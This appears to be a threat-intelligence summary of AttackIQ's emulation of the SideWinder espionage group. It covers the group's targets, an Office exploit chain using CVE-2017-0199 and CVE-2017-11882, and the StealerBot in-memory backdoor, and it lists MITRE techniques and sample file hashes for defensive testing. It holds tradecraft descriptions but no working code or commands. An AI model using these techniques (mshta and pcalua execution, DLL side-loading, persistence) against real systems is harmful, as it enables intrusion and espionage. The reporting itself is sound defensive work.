SideWinder, active since at least 2012, conducts targeted cyber-espionage against military, government, and maritime organizations across the Indian Ocean and Mediterranean regions using spear-phishing with malicious Office documents that exploit CVE-2017-0199 and CVE-2017-11882 to deliver a modular in-memory backdoor called StealerBot. AttackIQ released an emulation/attack graph to validate defenses against SideWinder behaviors and provides sample hashes and scenarios to help organizations test detection and prevention capabilities. #SideWinder #StealerBot
Keypoints
- SideWinder targets military, government, ports, and maritime facilities across countries including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
- Initial access is via spear-phishing Office documents that use remote template injection (CVE-2017-0199) to fetch an RTF containing shellcode that exploits CVE-2017-11882.
- The shellcode performs environment checks to evade analysis and then downloads a small JavaScript payload which retrieves further stages from short-lived, rotated infrastructure.
- Delivery infrastructure uses geofencing, ephemeral URLs, and on-the-fly payload generation so each download yields a unique hash, complicating static detection and correlation.
- The final payload, StealerBot, is a modular, memory-resident backdoor with components injected and operated in memory to avoid disk artifacts.
- AttackIQ published an emulation (attack graph) that reproduces SideWinder TTPs to help assess and validate security controls and incident response processes.
- Multiple test samples and SHA256 hashes are provided to evaluate network and endpoint controls, including .DOCX, .RTF, a backdoor loader DLL, and an unencrypted StealerBot sample.
MITRE Techniques
- [T1105 ] Ingress Tool Transfer – Downloaded malicious .DOCX, .RTF and loader samples to the host (“The SideWinder .DOCX Sample … is downloaded to memory and saved to disk”).
- [T1218.005 ] Signed Binary Proxy Execution: Mshta – Downloaded and executed a remote HTA via mshta.exe (“…rtf file is dropped and executed via mshta.exe”).
- [T1082 ] System Information Discovery – GlobalMemoryStatusEx API call used to gather physical and virtual memory information (“…system memory is checked via GlobalMemoryStatusEx”).
- [T1518.001 ] Security Software Discovery – WMIC query to enumerate installed antivirus products (“WMIC is executed to retrieve the list of antivirus products installed on the system”).
- [T1202 ] Indirect Command Execution – Abuse of pcalua.exe to execute a payload (“…a payload is executed using pcalua.exe”).
- [T1053.005 ] Scheduled Task – Persistence via creation of scheduled tasks using schtasks (“This scenario creates a new scheduled task for persistence using the schtasks utility”).
- [T1547.001 ] Registry Run Keys / Startup Folder – Persistence via Run/RunOnce registry keys (“creates an entry under the HKLM…Run registry key to be run at system startup”).
- [T1574.002 ] DLL Side-Loading – Leveraging a legitimate executable to load a malicious DLL (“This scenario leverages a legitimate and trusted executable to load a malicious Dynamic-link Library (DLL)”).
Indicators of Compromise
- [File Hash ] Known sample hashes provided for testing – 57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d (.DOCX), d9e373aeea5fe0c744f0de94fdd366b5b6da816209ac394cbbda1c64c03b50b1 (.RTF)
- [File Hash ] Backdoor and loader samples – 44ff1117bb0167f85d599236892deede636c358df3d8908582a6ce6a48070bd4 (vsstrace.dll loader), and unencrypted StealerBot sample (same RTF hash noted above)
- [File Name ] Malicious document and loader filenames used in scenarios – .DOCX sample, .RTF sample, vsstrace.dll (loader)
- [Network ] Delivery infrastructure characteristics – short-lived/rotated URLs and geofenced servers that return empty RTF to non-targets (no specific domains listed in article)
Read more: https://www.attackiq.com/2025/11/13/emulating-sidewinder/